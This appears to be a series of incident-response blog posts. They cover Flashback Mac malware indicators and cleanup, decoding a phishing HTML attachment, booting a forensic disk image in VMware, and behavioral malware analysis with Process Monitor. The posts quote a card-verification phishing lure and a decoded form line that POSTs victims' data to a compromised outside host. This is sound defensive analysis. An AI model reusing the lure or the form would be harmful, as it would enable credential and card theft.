Flashback is Mac malware that has recently been showing up with a vengeance. The latest version .K is exploiting a newly patched java vulnerability on OS X. F-secure recently posted about detecting and removing it from a system. In this post, I’ll cover some addition artifacts found on an infected machine and include a script to remove it.
When responding to an infected system, I noticed that in the /var/log/secure.log it included a couple of indicators of infection. The indicators below may help you detect infected users if you are using syslog for your OS X devices. Seeing a “/bin/sh” followed by the “suppressing keychain prompt” within a couple of minutes of each other that has been a solid indicator in the log. When looking through the systems, the suppressing keychain prompt did not show up in a years worth of logs until after it was infected.
Mar 31 14:17:32 K-MacBook-Pro com.apple.SecurityServer: UID 501 authenticated as user k (UID 501) for right ‘system.privilege.admin’ Mar 31 14:17:32 K-MacBook-Pro com.apple.SecurityServer: Succeeded authorizing right ‘system.privilege.admin’ by client ‘/private/tmp/Software Update’ for authorization created by ‘/private/tmp/Software Update’
Mar 31 14:17:32 K-MacBook-Pro com.apple.SecurityServer: Succeeded authorizing right ‘system.privilege.admin’ by client ‘/usr/libexec/security_authtrampoline’ for authorization created by ‘/private/tmp/Software Update’
Mar 31 14:17:32 K-MacBook-Pro authexec: executing /bin/sh
Mar 31 14:19:55 K-MacBook com.apple.SecurityServer: suppressing keychain prompt for invalidly signed client /Applications/Safari.app(658)
I also collected file system MAC times on the infected machine. You can see the malware being created .QUICKHEALXGEN.png and .QUICKHEALXGEN.xsl. Additionally you see chmod and mv accessed. This matches up with F-secure analysis.
2012 Mar 31 Sat 14:17:32
102 m.c. drwxr-xr-x 0 0 0 /Applications/Safari.app
374 m.c. drwxr-xr-x 0 0 0 /Applications/Safari.app/Contents
4643 m.c. -rw-rw-rw- 501 20 0 /Applications/Safari.app/Contents/Info.plist
20400 m.c. drwxr-xr-x 0 0 0 /Applications/Safari.app/Contents/Resources
403744 m… -rwxrwxrwx 501 0 0 /Applications/Safari.app/Contents/Resources/ .QUICKHEALXGEN.png
26168 m… -rwxrwxrwx 501 0 0 /Applications/Safari.app/Contents/Resources/.QUICKHEALXGEN.xsl
62656 .a.. -r-xr-xr-x 0 0 0 /bin/chmod
44848 .a.. -r-xr-xr-x 0 0 0 /bin/mv
Submitting the malware to virus total had poor results with only 8 out of 42 detecting it as of April 4th.
This script has several components: It checks for both types of infections discussed by F-Secure, backups a copy of the two plist files and names them .infected, prompts user if they want to clean the infection and also prompts the user to disable java in Safari. While I have tested this script on the cleanup of the Safari Info.plist, I have not seen an infection of the environment.plist. The cleanup should work, but please test it before you use it. I will not be held liable for any problems.
I have built in a simple update function that will check for a new version using the -u switch at the command line. If a new outbreak happens, I’ll try and keep it updated. You can submit bug fixes to the blog or to the email address in the script.
To run the program, unzip the download below and double click on the flashback-detect.command file. It will prompt you for your password and check to see if your infected. You can also run it from terminal using the flashback-detect.sh.
Get the script HERE.
My goal, when preforming analysis on phishing emails, is to get the URL out of the code, report it, and block it.
Typical Phishing Email.
For security reasons, your card was blocked.
Following an abnormal activity, we saw that someone used the card without
your permission, so to protect you, we blocked the card.
Once you have reactivated your Visa Card records, your card service will
not be interrupted and will continue as normal.
To reactivate your Visa Card download and complete the form attached to
Note: Failure to verify your records will result in card suspension.
Visa will periodically send you information about site changes and
© Copyright 2001-2011 Visa. All Rights Reserved
File attached to email
In this case, the file was an html attachment to the email. I saved the file and opened it in a text editor. If I had to follow a link to a phishing site, I would have downloaded the page using TOR and wget script..
To convert it to ascii, remove everything up to the first single quote. The start of the file should begin with the %. I did this using the linux cut command and saved the file as complete-document.htm
#cat html.txt |cut -d ” ‘ ” -f2 >complete-document.htm
Now that we have just the hex encoded part of the html, we are going to use a bash tool xdd to convert it.
#cat complete-document.htm |xxd -r -p |less
Verified by Visa.. (truncated)...
That is it as far as decoding the file, but that is just the start of your Incident response process.
Within the decode, you should see either additional links for the victim to follow, or a web form that uses a POST to a website. In this case, you can grep for the words post and get to find out where this data is going.
#cat complete-document.htm |cut -d “‘” -f2 |xxd -r -p |egrep -i ‘post|get’
form name="run.php" action="http://compromised-host.com/imicommerce/images/music/sample/.m/q.php" method="POST" onSubmit="return OnMultiSubmitHandler(optinLang)
Now that you have the URL, you will need to determine if any systems on your network sent information to the website. You should check logs from your:DNS Servers,Firewall, Network Flows, Web Proxy servers and any other network intelligence for connectivity to determine if any users accessed the site.
- Any system that accessed the site my possibly have malware on it.
- If the phish is targeting credentials, the user account should be locked and force to reset passwords.
- If the user entered banking information they will need to notify the bank ASAP.
Report the site as compromised to the whois information contact, the security contact of the organization the phishing email is targeting and add it to phishtank.
If you have a dns blacklist server or web proxy add the domain to the block list. Be careful if this site is part of a larger site as you will be blocking access to the entire domain.
Sometimes as an incident responder we get called on to analyze a system that has already been “looked at” by another admin or desktop support personnel. Most of the time, I tell them the evidence has been trampled on by different malware scanning software and just re-image the system. But, sometime you may need to do analysis on the system.
In this instance, a number of different malware products had been ran, along with clearing temp files and Internet cache, but the system was still showing signs of infection. After building a timeline , I was able to determine that the initial infection vector had been deleted and the malware hosting site had been pulled off-line. The system had a nasty rootkit that was injecting code into a couple of processes. I didn’t have time to run it through ollydbg or Ida Pro.
I needed a quick way of determine the capabilities of the malware, so I decided to boot a copy of the original dd image using vmware and then do behavioral analysis on the system. I could have used software such as Live View, but I wasn’t sure how well it worked with Linux as my host OS. Harlan Carvey did a great post in 2007 about booting a dd image using vmware, I wanted to turn that idea into a procedure.
- Make sure you are using a backup copy of the dd image, as this will make changes to the image file.
- Launch Prodiscover Basic
a. Select ->Image convert tools -> Vmware support for DD Images
- Select the dd file
- In the same folder as the dd file it will create a .vmdk file.
5.Create a new virtual machine. Use the wizard and select typical machine, install OS later and Guest OS and take default setting on all the rest.
6.Select VM Settings. Under VMware 7.0 choose the Vm Menu ->Setting
7.Remove the default hard drive
8. Select add-> hard disk then next
9.Select use existing virtual disk. Browse to the new vmdk file created.
10. Boot the VM.
11. Use the process described in a previous post to determine what the malware is doing. Make sure that you use the applications that you are worried about the malware interacting with. For example, if you are worried about a web-based credential stealing malware, try logging into site like E-bay, Citibank and maybe a custom app from your company. Make sure you are using fake credentials if you do not want to potentially leak real ones.
Dark reading just recently had a post on a Java based command line tool to for doing this. I have yet to use it, but it may be worth checking out.
Lately I’ve been running into malware that doesn’t play nicely with analysis websites like CWsandbox or Norman. I needed to find indicators of infection for a mariposa variant and both sites would not analyze it. It appears that it needs the presence of both the .exe and its specially crafted desktop.ini before it will execute. Since you can only submit one file to these websites, I needed to do the analysis on my own. When doing this type of analysis, we are just looking at the changes it made to the system and not specifically determining the capabilities of the software.
The first thing you need to do is make sure you have a system that mirrors your environment, this is easier if you have a standard desktop build. When possible I try to use VMWare for my analysis machine. Depending on the malware, this may not work. I’ve had good results with uninstalling VMware tools and not having malware detect it running in a VM. One of the easier ways for malware to detect a VM environment is checking for VMware tools/ drivers. This may also help prevent a VMware exploit as many of these exploits use the Vmware tools to accomplish this.
Once you have removed VMware tools, you will want to install any tool that you will use for analysis. I’m going to cover Process monitor today as its quick and easy for what I was trying to do. Once your tools are installed, take a snapshot of the system. If you are going to let your malware actually connect to the Internet to pull down secondary tools, it’s a good idea to use TOR or better yet use a different internet pipe rather than your corporate network. You could also use a sandnet like TRUMAN, but that is out of scope for this post.
Capturing network traffic can also be useful in tracking down infections. Process Monitor also keeps track of network connections, but I like to do this on the host rather than the guest for a couple of reasons:
- Prevents malware detecting the network card in promiscuous mode.
- Smaller foot print on machine.
1. Start your network packet capture tool. I like to set the capture interface to the guest virtual NIC, but on most system the primary interface will capture all the traffic.
tcpdump -nni eth1 host 192.168.1.1 -w infection.pcap
-nn (tells tcpdump not to convert to names )
eth1 (is the interface I want to capture traffic from)
host 192.168.1.1 (capture all traffic from VM ip address)
-w switch says write to file
2. Start Process Monitor
It will automatically start collecting data.
3. Run Malware
Depending on the malware, it will have multiple stages that may take a while for the infection to be completed.
4. Stop tcpdump and Process Monitor (3rd button from Left or CTRL+E). Disable the Network Card from the VM or Pull the network cable.
We want to setup display filters to determine what files and registry keys were created.
Click on the filter button. (Or Ctrl + L)
The top row has a bunch of drop-down menus that allows you to select what you want to filter.
Select Operation from the first Column.
Select each of the keys individually below and click add. Additionally, you can export the data into csv format and do filtering using a spreadsheet.
(UPDATE) Addition filters to add based on this post.setbasicinformation setdispositioninformationfile regdeletekey regdeletevalue regcreatekey
To get a better look at what processes the malware spawned you can add these to the filter:
Partial list of files that were written during infection by this version of mariposia.
Partial list of registry keys that were written during infection by this version of mariposia.
When trying to find indicators of infection, you generally want to look for ways the malware stays persistent on the machine. This malware variant adds an executable file in the recycle bin to start-up at winlogin.
You may need to infect your VM a couple of times to get enough information about how it’s randomizing its name. Now you can take this info and add it to a HIPS like OSSEC or a script to query all your computers in a domain.
For /f %i in (filename with computer to search.txt) do Reg query “\\%i\hklm\software\microsoft\Windows NT\CurrentVersion\winlogon” /v taskman >winlogonreg.txt
Then you can search the results file (winlogon.txt) for any computer that has Recycler in it, as no valid item should start from recycler when you log into the system.
Once analysis is completed, be sure to revert your VM back to the snapshot before the infection.
With the pcap file you created, you’ll want to analyze it using wireshark or tcpdump. There are a couple of quick things you will want to look for:
- DNS lookups (This will allow you to search your DNS logs for anyone querying the same DNS records as your infected VM).
- Data exfiltration traffic (Most malware these days send information it collects back to some type of command or data collection server.).
- Track down infected hosts using flows or firewall logs based on identified traffic.
- If you are comfortable with writing IDS rules, writing rules for this traffic will also help pick-up future infections once the other server are taken offline.